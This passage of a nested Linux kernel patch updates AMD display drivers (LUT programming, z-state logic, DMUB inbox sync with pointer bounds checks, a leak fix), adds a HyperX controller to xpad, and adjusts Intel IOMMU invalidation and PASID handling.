+-				stream->lut3d_func->state.bits.rmu_mux_num);
++						       stream->lut3d_func->state.bits.rmu_mux_num);
+ 		if (acquired_rmu != stream->lut3d_func->state.bits.rmu_mux_num)
+ 			BREAK_TO_DEBUGGER();
+-		result = mpc->funcs->program_3dlut(mpc,
+-								&stream->lut3d_func->lut_3d,
+-								stream->lut3d_func->state.bits.rmu_mux_num);
++
++		result = mpc->funcs->program_3dlut(mpc, &stream->lut3d_func->lut_3d,
++						   stream->lut3d_func->state.bits.rmu_mux_num);
+ 		result = mpc->funcs->program_shaper(mpc, shaper_lut,
+-				stream->lut3d_func->state.bits.rmu_mux_num);
+-	} else
+-		/*loop through the available mux and release the requested mpcc_id*/
++						    stream->lut3d_func->state.bits.rmu_mux_num);
++	} else {
++		// loop through the available mux and release the requested mpcc_id
+ 		mpc->funcs->release_rmu(mpc, mpcc_id);
+-
++	}
+ 
+ 	return result;
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index 503ab45b4ace3..6b8abdb5c7f89 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -884,7 +884,7 @@ static const struct dc_plane_cap plane_cap = {
+ static const struct dc_debug_options debug_defaults_drv = {
+ 	.disable_z10 = false,
+ 	.enable_z9_disable_interface = true,
+-	.minimum_z8_residency_time = 2000,
++	.minimum_z8_residency_time = 2100,
+ 	.psr_skip_crtc_disable = true,
+ 	.disable_dmcu = true,
+ 	.force_abm_enable = false,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index 50b3547977281..bd75d3cba0980 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+@@ -530,7 +530,7 @@ static bool dcn32_set_mpc_shaper_3dlut(
+ 		if (stream->func_shaper->type == TF_TYPE_HWPWL)
+ 			shaper_lut = &stream->func_shaper->pwl;
+ 		else if (stream->func_shaper->type == TF_TYPE_DISTRIBUTED_POINTS) {
+-			cm_helper_translate_curve_to_hw_format(
++			cm_helper_translate_curve_to_hw_format(stream->ctx,
+ 					stream->func_shaper,
+ 					&dpp_base->shaper_params, true);
+ 			shaper_lut = &dpp_base->shaper_params;
+@@ -566,8 +566,7 @@ bool dcn32_set_mcm_luts(
+ 		if (plane_state->blend_tf->type == TF_TYPE_HWPWL)
+ 			lut_params = &plane_state->blend_tf->pwl;
+ 		else if (plane_state->blend_tf->type == TF_TYPE_DISTRIBUTED_POINTS) {
+-			cm_helper_translate_curve_to_hw_format(
+-					plane_state->blend_tf,
++			cm3_helper_translate_curve_to_hw_format(plane_state->blend_tf,
+ 					&dpp_base->regamma_params, false);
+ 			lut_params = &dpp_base->regamma_params;
+ 		}
+@@ -581,8 +580,7 @@ bool dcn32_set_mcm_luts(
+ 		else if (plane_state->in_shaper_func->type == TF_TYPE_DISTRIBUTED_POINTS) {
+ 			// TODO: dpp_base replace
+ 			ASSERT(false);
+-			cm_helper_translate_curve_to_hw_format(
+-					plane_state->in_shaper_func,
++			cm3_helper_translate_curve_to_hw_format(plane_state->in_shaper_func,
+ 					&dpp_base->shaper_params, true);
+ 			lut_params = &dpp_base->shaper_params;
+ 		}
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dc_features.h b/drivers/gpu/drm/amd/display/dc/dml/dc_features.h
+index 74e86732e3010..2cbdd75429ffd 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dc_features.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/dc_features.h
+@@ -29,6 +29,13 @@
+ #define DC__PRESENT 1
+ #define DC__PRESENT__1 1
+ #define DC__NUM_DPP 4
++
++/**
++ * @DC__VOLTAGE_STATES:
++ *
++ * Define the maximum amount of states supported by the ASIC. Every ASIC has a
++ * specific number of states; this macro defines the maximum number of states.
++ */
+ #define DC__VOLTAGE_STATES 20
+ #define DC__NUM_DPP__4 1
+ #define DC__NUM_DPP__0_PRESENT 1
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+index dbe5d2efa4a30..9d224bb2b3df6 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+@@ -948,10 +948,8 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ {
+ 	int plane_count;
+ 	int i;
+-	unsigned int min_dst_y_next_start_us;
+ 
+ 	plane_count = 0;
+-	min_dst_y_next_start_us = 0;
+ 	for (i = 0; i < dc->res_pool->pipe_count; i++) {
+ 		if (context->res_ctx.pipe_ctx[i].plane_state)
+ 			plane_count++;
+@@ -973,26 +971,15 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 	else if (context->stream_count == 1 &&  context->streams[0]->signal == SIGNAL_TYPE_EDP) {
+ 		struct dc_link *link = context->streams[0]->sink->link;
+ 		struct dc_stream_status *stream_status = &context->stream_status[0];
+-		struct dc_stream_state *current_stream = context->streams[0];
+ 		int minmum_z8_residency = dc->debug.minimum_z8_residency_time > 0 ? dc->debug.minimum_z8_residency_time : 1000;
+ 		bool allow_z8 = context->bw_ctx.dml.vba.StutterPeriod > (double)minmum_z8_residency;
+ 		bool is_pwrseq0 = link->link_index == 0;
+-		bool isFreesyncVideo;
+-
+-		isFreesyncVideo = current_stream->adjust.v_total_min == current_stream->adjust.v_total_max;
+-		isFreesyncVideo = isFreesyncVideo && current_stream->timing.v_total < current_stream->adjust.v_total_min;
+-		for (i = 0; i < dc->res_pool->pipe_count; i++) {
+-			if (context->res_ctx.pipe_ctx[i].stream == current_stream && isFreesyncVideo) {
+-				min_dst_y_next_start_us = context->res_ctx.pipe_ctx[i].dlg_regs.min_dst_y_next_start_us;
+-				break;
+-			}
+-		}
+ 
+ 		/* Don't support multi-plane configurations */
+ 		if (stream_status->plane_count > 1)
+ 			return DCN_ZSTATE_SUPPORT_DISALLOW;
+ 
+-		if (is_pwrseq0 && (context->bw_ctx.dml.vba.StutterPeriod > 5000.0 || min_dst_y_next_start_us > 5000))
++		if (is_pwrseq0 && context->bw_ctx.dml.vba.StutterPeriod > 5000.0)
+ 			return DCN_ZSTATE_SUPPORT_ALLOW;
+ 		else if (is_pwrseq0 && link->psr_settings.psr_version == DC_PSR_VERSION_1 && !link->panel_config.psr.disable_psr)
+ 			return allow_z8 ? DCN_ZSTATE_SUPPORT_ALLOW_Z8_Z10_ONLY : DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index c89b761bcb926..85e0d1c2a9085 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -1788,6 +1788,7 @@ void dcn32_calculate_wm_and_dlg_fpu(struct dc *dc, struct dc_state *context,
+ 	int i, pipe_idx, vlevel_temp = 0;
+ 	double dcfclk = dcn3_2_soc.clock_limits[0].dcfclk_mhz;
+ 	double dcfclk_from_validation = context->bw_ctx.dml.vba.DCFCLKState[vlevel][context->bw_ctx.dml.vba.maxMpcComb];
++	double dram_speed_from_validation = context->bw_ctx.dml.vba.DRAMSpeed;
+ 	double dcfclk_from_fw_based_mclk_switching = dcfclk_from_validation;
+ 	bool pstate_en = context->bw_ctx.dml.vba.DRAMClockChangeSupport[vlevel][context->bw_ctx.dml.vba.maxMpcComb] !=
+ 			dm_dram_clock_change_unsupported;
+@@ -1921,7 +1922,7 @@ void dcn32_calculate_wm_and_dlg_fpu(struct dc *dc, struct dc_state *context,
+ 	}
+ 
+ 	if (dc->clk_mgr->bw_params->wm_table.nv_entries[WM_C].valid) {
+-		min_dram_speed_mts = context->bw_ctx.dml.vba.DRAMSpeed;
++		min_dram_speed_mts = dram_speed_from_validation;
+ 		min_dram_speed_mts_margin = 160;
+ 
+ 		context->bw_ctx.dml.soc.dram_clock_change_latency_us =
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/display_mode_enums.h b/drivers/gpu/drm/amd/display/dc/dml/display_mode_enums.h
+index f394b3f3922a8..0bffae95f3a29 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/display_mode_enums.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/display_mode_enums.h
+@@ -105,14 +105,39 @@ enum source_macro_tile_size {
+ enum cursor_bpp {
+ 	dm_cur_2bit = 0, dm_cur_32bit = 1, dm_cur_64bit = 2
+ };
++
++/**
++ * @enum clock_change_support - It represents possible reasons to change the DRAM clock.
++ *
++ * DC may change the DRAM clock during its execution, and this enum tracks all
++ * the available methods. Note that every ASIC has their specific way to deal
++ * with these clock switch.
++ */
+ enum clock_change_support {
++	/**
++	 * @dm_dram_clock_change_uninitialized: If you see this, we might have
++	 * a code initialization issue
++	 */
+ 	dm_dram_clock_change_uninitialized = 0,
++
++	/**
++	 * @dm_dram_clock_change_vactive: Support DRAM switch in VActive
++	 */
+ 	dm_dram_clock_change_vactive,
++
++	/**
++	 * @dm_dram_clock_change_vblank: Support DRAM switch in VBlank
++	 */
+ 	dm_dram_clock_change_vblank,
++
+ 	dm_dram_clock_change_vactive_w_mall_full_frame,
+ 	dm_dram_clock_change_vactive_w_mall_sub_vp,
+ 	dm_dram_clock_change_vblank_w_mall_full_frame,
+ 	dm_dram_clock_change_vblank_w_mall_sub_vp,
++
++	/**
++	 * @dm_dram_clock_change_unsupported: Do not support DRAM switch
++	 */
+ 	dm_dram_clock_change_unsupported
+ };
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.h b/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.h
+index 2b34b02dbd459..81e53e67cd0b0 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.h
+@@ -419,6 +419,15 @@ struct vba_vars_st {
+ 	double MinPixelChunkSizeBytes;
+ 	unsigned int DCCMetaBufferSizeBytes;
+ 	// Pipe/Plane Parameters
++
++	/** @VoltageLevel:
++	 * Every ASIC has a fixed number of DPM states, and some devices might
++	 * have some particular voltage configuration that does not map
++	 * directly to the DPM states. This field tells how many states the
++	 * target device supports; even though this field combines the DPM and
++	 * special SOC voltages, it mostly matches the total number of DPM
++	 * states.
++	 */
+ 	int VoltageLevel;
+ 	double FabricClock;
+ 	double DRAMSpeed;
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/core_types.h b/drivers/gpu/drm/amd/display/dc/inc/core_types.h
+index 5fa7c4772af4f..d2b9e3f83fc3b 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/core_types.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/core_types.h
+@@ -115,6 +115,13 @@ struct resource_funcs {
+ 				int vlevel);
+ 	void (*update_soc_for_wm_a)(
+ 				struct dc *dc, struct dc_state *context);
++
++	/**
++	 * @populate_dml_pipes - Populate pipe data struct
++	 *
++	 * Returns:
++	 * Total of pipes available in the specific ASIC.
++	 */
+ 	int (*populate_dml_pipes)(
+ 		struct dc *dc,
+ 		struct dc_state *context,
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw/hw_shared.h b/drivers/gpu/drm/amd/display/dc/inc/hw/hw_shared.h
+index cd2be729846b4..a819f0f97c5f3 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw/hw_shared.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw/hw_shared.h
+@@ -35,6 +35,13 @@
+  ******************************************************************************/
+ 
+ #define MAX_AUDIOS 7
++
++/**
++ * @MAX_PIPES:
++ *
++ * Every ASIC support a fixed number of pipes; MAX_PIPES defines a large number
++ * to be used inside loops and for determining array sizes.
++ */
+ #define MAX_PIPES 6
+ #define MAX_DIG_LINK_ENCODERS 7
+ #define MAX_DWB_PIPES	1
+diff --git a/drivers/gpu/drm/amd/display/dmub/dmub_srv.h b/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
+index a21fe7b037d1f..aaabaab49809d 100644
+--- a/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
++++ b/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
+@@ -332,6 +332,8 @@ struct dmub_srv_hw_funcs {
+ 	void (*setup_mailbox)(struct dmub_srv *dmub,
+ 			      const struct dmub_region *inbox1);
+ 
++	uint32_t (*get_inbox1_wptr)(struct dmub_srv *dmub);
++
+ 	uint32_t (*get_inbox1_rptr)(struct dmub_srv *dmub);
+ 
+ 	void (*set_inbox1_wptr)(struct dmub_srv *dmub, uint32_t wptr_offset);
+@@ -590,6 +592,18 @@ enum dmub_status dmub_srv_hw_init(struct dmub_srv *dmub,
+  */
+ enum dmub_status dmub_srv_hw_reset(struct dmub_srv *dmub);
+ 
++/**
++ * dmub_srv_sync_inbox1() - sync sw state with hw state
++ * @dmub: the dmub service
++ *
++ * Sync sw state with hw state when resume from S0i3
++ *
++ * Return:
++ *   DMUB_STATUS_OK - success
++ *   DMUB_STATUS_INVALID - unspecified error
++ */
++enum dmub_status dmub_srv_sync_inbox1(struct dmub_srv *dmub);
++
+ /**
+  * dmub_srv_cmd_queue() - queues a command to the DMUB
+  * @dmub: the dmub service
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn20.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn20.c
+index a6540e27044d2..98dad0d47e72c 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn20.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn20.c
+@@ -282,6 +282,11 @@ void dmub_dcn20_setup_mailbox(struct dmub_srv *dmub,
+ 	REG_WRITE(DMCUB_INBOX1_SIZE, inbox1->top - inbox1->base);
+ }
+ 
++uint32_t dmub_dcn20_get_inbox1_wptr(struct dmub_srv *dmub)
++{
++	return REG_READ(DMCUB_INBOX1_WPTR);
++}
++
+ uint32_t dmub_dcn20_get_inbox1_rptr(struct dmub_srv *dmub)
+ {
+ 	return REG_READ(DMCUB_INBOX1_RPTR);
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn20.h b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn20.h
+index c2e5831ac52cc..1df128e57ed3b 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn20.h
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn20.h
+@@ -202,6 +202,8 @@ void dmub_dcn20_setup_windows(struct dmub_srv *dmub,
+ void dmub_dcn20_setup_mailbox(struct dmub_srv *dmub,
+ 			      const struct dmub_region *inbox1);
+ 
++uint32_t dmub_dcn20_get_inbox1_wptr(struct dmub_srv *dmub);
++
+ uint32_t dmub_dcn20_get_inbox1_rptr(struct dmub_srv *dmub);
+ 
+ void dmub_dcn20_set_inbox1_wptr(struct dmub_srv *dmub, uint32_t wptr_offset);
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.c
+index 89d24fb7024e2..5e952541e72d5 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.c
+@@ -242,6 +242,11 @@ void dmub_dcn31_setup_mailbox(struct dmub_srv *dmub,
+ 	REG_WRITE(DMCUB_INBOX1_SIZE, inbox1->top - inbox1->base);
+ }
+ 
++uint32_t dmub_dcn31_get_inbox1_wptr(struct dmub_srv *dmub)
++{
++	return REG_READ(DMCUB_INBOX1_WPTR);
++}
++
+ uint32_t dmub_dcn31_get_inbox1_rptr(struct dmub_srv *dmub)
+ {
+ 	return REG_READ(DMCUB_INBOX1_RPTR);
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.h b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.h
+index eb62410941473..89c5a948b67d5 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.h
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.h
+@@ -204,6 +204,8 @@ void dmub_dcn31_setup_windows(struct dmub_srv *dmub,
+ void dmub_dcn31_setup_mailbox(struct dmub_srv *dmub,
+ 			      const struct dmub_region *inbox1);
+ 
++uint32_t dmub_dcn31_get_inbox1_wptr(struct dmub_srv *dmub);
++
+ uint32_t dmub_dcn31_get_inbox1_rptr(struct dmub_srv *dmub);
+ 
+ void dmub_dcn31_set_inbox1_wptr(struct dmub_srv *dmub, uint32_t wptr_offset);
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
+index 9c20516be066c..d2f03f797279f 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
+@@ -266,6 +266,11 @@ void dmub_dcn32_setup_mailbox(struct dmub_srv *dmub,
+ 	REG_WRITE(DMCUB_INBOX1_SIZE, inbox1->top - inbox1->base);
+ }
+ 
++uint32_t dmub_dcn32_get_inbox1_wptr(struct dmub_srv *dmub)
++{
++	return REG_READ(DMCUB_INBOX1_WPTR);
++}
++
+ uint32_t dmub_dcn32_get_inbox1_rptr(struct dmub_srv *dmub)
+ {
+ 	return REG_READ(DMCUB_INBOX1_RPTR);
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.h b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.h
+index 7d1a6eb4d6657..f15336b6e22be 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.h
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.h
+@@ -206,6 +206,8 @@ void dmub_dcn32_setup_windows(struct dmub_srv *dmub,
+ void dmub_dcn32_setup_mailbox(struct dmub_srv *dmub,
+ 			      const struct dmub_region *inbox1);
+ 
++uint32_t dmub_dcn32_get_inbox1_wptr(struct dmub_srv *dmub);
++
+ uint32_t dmub_dcn32_get_inbox1_rptr(struct dmub_srv *dmub);
+ 
+ void dmub_dcn32_set_inbox1_wptr(struct dmub_srv *dmub, uint32_t wptr_offset);
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
+index c3327875933e9..e951fd837aa27 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
+@@ -167,6 +167,7 @@ static bool dmub_srv_hw_setup(struct dmub_srv *dmub, enum dmub_asic asic)
+ 		funcs->backdoor_load = dmub_dcn20_backdoor_load;
+ 		funcs->setup_windows = dmub_dcn20_setup_windows;
+ 		funcs->setup_mailbox = dmub_dcn20_setup_mailbox;
++		funcs->get_inbox1_wptr = dmub_dcn20_get_inbox1_wptr;
+ 		funcs->get_inbox1_rptr = dmub_dcn20_get_inbox1_rptr;
+ 		funcs->set_inbox1_wptr = dmub_dcn20_set_inbox1_wptr;
+ 		funcs->is_supported = dmub_dcn20_is_supported;
+@@ -243,6 +244,7 @@ static bool dmub_srv_hw_setup(struct dmub_srv *dmub, enum dmub_asic asic)
+ 		funcs->backdoor_load = dmub_dcn31_backdoor_load;
+ 		funcs->setup_windows = dmub_dcn31_setup_windows;
+ 		funcs->setup_mailbox = dmub_dcn31_setup_mailbox;
++		funcs->get_inbox1_wptr = dmub_dcn31_get_inbox1_wptr;
+ 		funcs->get_inbox1_rptr = dmub_dcn31_get_inbox1_rptr;
+ 		funcs->set_inbox1_wptr = dmub_dcn31_set_inbox1_wptr;
+ 		funcs->setup_out_mailbox = dmub_dcn31_setup_out_mailbox;
+@@ -281,6 +283,7 @@ static bool dmub_srv_hw_setup(struct dmub_srv *dmub, enum dmub_asic asic)
+ 		funcs->backdoor_load_zfb_mode = dmub_dcn32_backdoor_load_zfb_mode;
+ 		funcs->setup_windows = dmub_dcn32_setup_windows;
+ 		funcs->setup_mailbox = dmub_dcn32_setup_mailbox;
++		funcs->get_inbox1_wptr = dmub_dcn32_get_inbox1_wptr;
+ 		funcs->get_inbox1_rptr = dmub_dcn32_get_inbox1_rptr;
+ 		funcs->set_inbox1_wptr = dmub_dcn32_set_inbox1_wptr;
+ 		funcs->setup_out_mailbox = dmub_dcn32_setup_out_mailbox;
+@@ -666,6 +669,27 @@ enum dmub_status dmub_srv_hw_init(struct dmub_srv *dmub,
+ 	return DMUB_STATUS_OK;
+ }
+ 
++enum dmub_status dmub_srv_sync_inbox1(struct dmub_srv *dmub)
++{
++	if (!dmub->sw_init)
++		return DMUB_STATUS_INVALID;
++
++	if (dmub->hw_funcs.get_inbox1_rptr && dmub->hw_funcs.get_inbox1_wptr) {
++		uint32_t rptr = dmub->hw_funcs.get_inbox1_rptr(dmub);
++		uint32_t wptr = dmub->hw_funcs.get_inbox1_wptr(dmub);
++
++		if (rptr > dmub->inbox1_rb.capacity || wptr > dmub->inbox1_rb.capacity) {
++			return DMUB_STATUS_HW_FAILURE;
++		} else {
++			dmub->inbox1_rb.rptr = rptr;
++			dmub->inbox1_rb.wrpt = wptr;
++			dmub->inbox1_last_wptr = dmub->inbox1_rb.wrpt;
++		}
++	}
++
++	return DMUB_STATUS_OK;
++}
++
+ enum dmub_status dmub_srv_hw_reset(struct dmub_srv *dmub)
+ {
+ 	if (!dmub->sw_init)
+@@ -694,6 +718,11 @@ enum dmub_status dmub_srv_cmd_queue(struct dmub_srv *dmub,
+ 	if (!dmub->hw_init)
+ 		return DMUB_STATUS_INVALID;
+ 
++	if (dmub->inbox1_rb.rptr > dmub->inbox1_rb.capacity ||
++	    dmub->inbox1_rb.wrpt > dmub->inbox1_rb.capacity) {
++		return DMUB_STATUS_HW_FAILURE;
++	}
++
+ 	if (dmub_rb_push_front(&dmub->inbox1_rb, cmd))
+ 		return DMUB_STATUS_OK;
+ 
+@@ -964,6 +993,7 @@ enum dmub_status dmub_srv_wait_for_inbox0_ack(struct dmub_srv *dmub, uint32_t ti
+ 		ack = dmub->hw_funcs.read_inbox0_ack_register(dmub);
+ 		if (ack)
+ 			return DMUB_STATUS_OK;
++		udelay(1);
+ 	}
+ 	return DMUB_STATUS_TIMEOUT;
+ }
+diff --git a/drivers/gpu/drm/amd/include/asic_reg/gc/gc_11_0_0_offset.h b/drivers/gpu/drm/amd/include/asic_reg/gc/gc_11_0_0_offset.h
+index c92c4b83253f8..4bff1ef8a9a64 100644
+--- a/drivers/gpu/drm/amd/include/asic_reg/gc/gc_11_0_0_offset.h
++++ b/drivers/gpu/drm/amd/include/asic_reg/gc/gc_11_0_0_offset.h
+@@ -6369,6 +6369,8 @@
+ #define regTCP_INVALIDATE_BASE_IDX                                                                      1
+ #define regTCP_STATUS                                                                                   0x19a1
+ #define regTCP_STATUS_BASE_IDX                                                                          1
++#define regTCP_CNTL                                                                                     0x19a2
++#define regTCP_CNTL_BASE_IDX                                                                            1
+ #define regTCP_CNTL2                                                                                    0x19a3
+ #define regTCP_CNTL2_BASE_IDX                                                                           1
+ #define regTCP_DEBUG_INDEX                                                                              0x19a5
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/aldebaran_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/aldebaran_ppt.c
+index d30ec3005ea19..cd8b0ab0112ae 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/aldebaran_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/aldebaran_ppt.c
+@@ -258,8 +258,11 @@ static int aldebaran_tables_init(struct smu_context *smu)
+ 	}
+ 
+ 	smu_table->ecc_table = kzalloc(tables[SMU_TABLE_ECCINFO].size, GFP_KERNEL);
+-	if (!smu_table->ecc_table)
++	if (!smu_table->ecc_table) {
++		kfree(smu_table->metrics_table);
++		kfree(smu_table->gpu_metrics_table);
+ 		return -ENOMEM;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index fc6957fddce8e..8404286302b0c 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -136,6 +136,7 @@ static const struct xpad_device {
+ 	{ 0x044f, 0x0f07, "Thrustmaster, Inc. Controller", 0, XTYPE_XBOX },
+ 	{ 0x044f, 0x0f10, "Thrustmaster Modena GT Wheel", 0, XTYPE_XBOX },
+ 	{ 0x044f, 0xb326, "Thrustmaster Gamepad GP XID", 0, XTYPE_XBOX360 },
++	{ 0x03f0, 0x0495, "HyperX Clutch Gladiate", 0, XTYPE_XBOXONE },
+ 	{ 0x045e, 0x0202, "Microsoft X-Box pad v1 (US)", 0, XTYPE_XBOX },
+ 	{ 0x045e, 0x0285, "Microsoft X-Box pad (Japan)", 0, XTYPE_XBOX },
+ 	{ 0x045e, 0x0287, "Microsoft Xbox Controller S", 0, XTYPE_XBOX },
+@@ -459,6 +460,7 @@ static const struct usb_device_id xpad_table[] = {
+ 	XPAD_XBOX360_VENDOR(0x0079),		/* GPD Win 2 Controller */
+ 	XPAD_XBOX360_VENDOR(0x03eb),		/* Wooting Keyboards (Legacy) */
+ 	XPAD_XBOX360_VENDOR(0x044f),		/* Thrustmaster X-Box 360 controllers */
++	XPAD_XBOXONE_VENDOR(0x03f0),		/* HP HyperX Xbox One Controllers */
+ 	XPAD_XBOX360_VENDOR(0x045e),		/* Microsoft X-Box 360 controllers */
+ 	XPAD_XBOXONE_VENDOR(0x045e),		/* Microsoft X-Box One controllers */
+ 	XPAD_XBOX360_VENDOR(0x046d),		/* Logitech X-Box 360 style controllers */
+diff --git a/drivers/iommu/intel/dmar.c b/drivers/iommu/intel/dmar.c
+index f800989ea0462..418af1db0192d 100644
+--- a/drivers/iommu/intel/dmar.c
++++ b/drivers/iommu/intel/dmar.c
+@@ -1495,6 +1495,15 @@ void qi_flush_dev_iotlb(struct intel_iommu *iommu, u16 sid, u16 pfsid,
+ {
+ 	struct qi_desc desc;
+ 
++	/*
++	 * VT-d spec, section 4.3:
++	 *
++	 * Software is recommended to not submit any Device-TLB invalidation
++	 * requests while address remapping hardware is disabled.
++	 */
++	if (!(iommu->gcmd & DMA_GCMD_TE))
++		return;
++
+ 	if (mask) {
+ 		addr |= (1ULL << (VTD_PAGE_SHIFT + mask - 1)) - 1;
+ 		desc.qw1 = QI_DEV_IOTLB_ADDR(addr) | QI_DEV_IOTLB_SIZE;
+@@ -1560,6 +1569,15 @@ void qi_flush_dev_iotlb_pasid(struct intel_iommu *iommu, u16 sid, u16 pfsid,
+ 	unsigned long mask = 1UL << (VTD_PAGE_SHIFT + size_order - 1);
+ 	struct qi_desc desc = {.qw1 = 0, .qw2 = 0, .qw3 = 0};
+ 
++	/*
++	 * VT-d spec, section 4.3:
++	 *
++	 * Software is recommended to not submit any Device-TLB invalidation
++	 * requests while address remapping hardware is disabled.
++	 */
++	if (!(iommu->gcmd & DMA_GCMD_TE))
++		return;
++
+ 	desc.qw0 = QI_DEV_EIOTLB_PASID(pasid) | QI_DEV_EIOTLB_SID(sid) |
+ 		QI_DEV_EIOTLB_QDEP(qdep) | QI_DEIOTLB_TYPE |
+ 		QI_DEV_IOTLB_PFSID(pfsid);
+diff --git a/drivers/iommu/intel/iommu.c b/drivers/iommu/intel/iommu.c
+index 5c4f5aa8e87e4..e111b35a7aff2 100644
+--- a/drivers/iommu/intel/iommu.c
++++ b/drivers/iommu/intel/iommu.c
+@@ -277,7 +277,7 @@ static LIST_HEAD(dmar_satc_units);
+ #define for_each_rmrr_units(rmrr) \
+ 	list_for_each_entry(rmrr, &dmar_rmrr_units, list)
+ 
+-static void dmar_remove_one_dev_info(struct device *dev);
++static void device_block_translation(struct device *dev);
+ 
+ int dmar_disabled = !IS_ENABLED(CONFIG_INTEL_IOMMU_DEFAULT_ON);
+ int intel_iommu_sm = IS_ENABLED(CONFIG_INTEL_IOMMU_SCALABLE_MODE_DEFAULT_ON);
+@@ -1418,7 +1418,7 @@ static void iommu_enable_pci_caps(struct device_domain_info *info)
+ {
+ 	struct pci_dev *pdev;
+ 
+-	if (!info || !dev_is_pci(info->dev))
++	if (!dev_is_pci(info->dev))
+ 		return;
+ 
+ 	pdev = to_pci_dev(info->dev);
+@@ -2064,7 +2064,6 @@ static int domain_context_mapping_one(struct dmar_domain *domain,
+ 	} else {
+ 		iommu_flush_write_buffer(iommu);
+ 	}
+-	iommu_enable_pci_caps(info);
+ 
+ 	ret = 0;
+ 
+@@ -2494,13 +2493,6 @@ static int domain_add_dev_info(struct dmar_domain *domain, struct device *dev)
+ 
+ 	/* PASID table is mandatory for a PCI device in scalable mode. */
+ 	if (sm_supported(iommu) && !dev_is_real_dma_subdevice(dev)) {
+-		ret = intel_pasid_alloc_table(dev);
+-		if (ret) {
+-			dev_err(dev, "PASID table allocation failed\n");
+-			dmar_remove_one_dev_info(dev);
+-			return ret;
+-		}
+-
+ 		/* Setup the PASID entry for requests without PASID: */
+ 		if (hw_pass_through && domain_type_is_si(domain))
+ 			ret = intel_pasid_setup_pass_through(iommu, domain,
